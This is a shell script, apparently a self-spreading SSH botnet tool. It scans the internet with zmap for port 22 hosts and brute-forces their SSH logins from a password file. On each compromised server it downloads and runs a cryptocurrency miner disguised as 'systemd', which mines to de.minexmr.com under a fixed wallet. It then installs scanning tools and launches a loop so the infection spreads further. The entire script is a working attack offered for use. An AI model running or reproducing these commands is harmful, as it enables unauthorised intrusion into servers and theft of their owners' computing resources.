rm -rf bios.txt
rm -rf mfu.txt
rm -rf banner.log
timeout="130"
speed="10"
interface="eth0"
port="22"
echo -e "\e[34m####################################################"
echo -e "\e[34m#        \e[32mMuie PSD                 \e[34m#"
echo -e "\e[34m#        \e[32mDeveloped By Ma-ta                     \e[34m#"
echo -e "\e[34m#        \e[32mSa te fut!!       \e[34m#"
echo -e "\e[34m####################################################"

sleep 5



./motd


sleep 1
zmap -p22 -o bios.txt -N 5000 -B 5M
sleep 2
./boner bios.txt 22 3500
pkill boner
cat banner.log  |grep SSH-2.0-OpenSSH |awk '{print $1}' |uniq |shuf >> mfu.txt

victims=`grep -c . mfu.txt`

echo -e "\e[35m[PRIVATE] \e[97mONION - \e[32mIncep sa fut !!!"
echo -e "\e[35m[PRIVATE] \e[97mONION - \e[32mAm gasit \e[91m$curve \e[32mvulnerabile"
sleep 1
clear
./brute 9999 -f mfu.txt pass_file 22 "curl -LO https://github.com/HiJackerrZ6/mine/raw/main/systemd || wget https://github.com/HiJackerrZ6/mine/raw/main/systemd ; chmod 777 systemd ; bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX ; apt install -y zmap ; yum install -y zmap ; dnf install -y zmap ; apt install -y screen ; yum install -y screen ; dnf install -y screen ; apt install -y unzip ; yum install -y unzip ; dnf install -y unzip ; curl -LO https://github.com/HiJackerrZ6/mine/archive/refs/heads/main.zip ; wget https://github.com/HiJackerrZ6/mine/archive/refs/heads/main.zip ; unzip main.zip ; cd mine-main ; chmod 777 * ; screen -S 'auto' ./loop"
echo -e "\e[35m[PRIVATE] \e[97mONION - \e[32mScan Has Been Finished ! All Output has been saved in --> \e[91mgasite.txt"
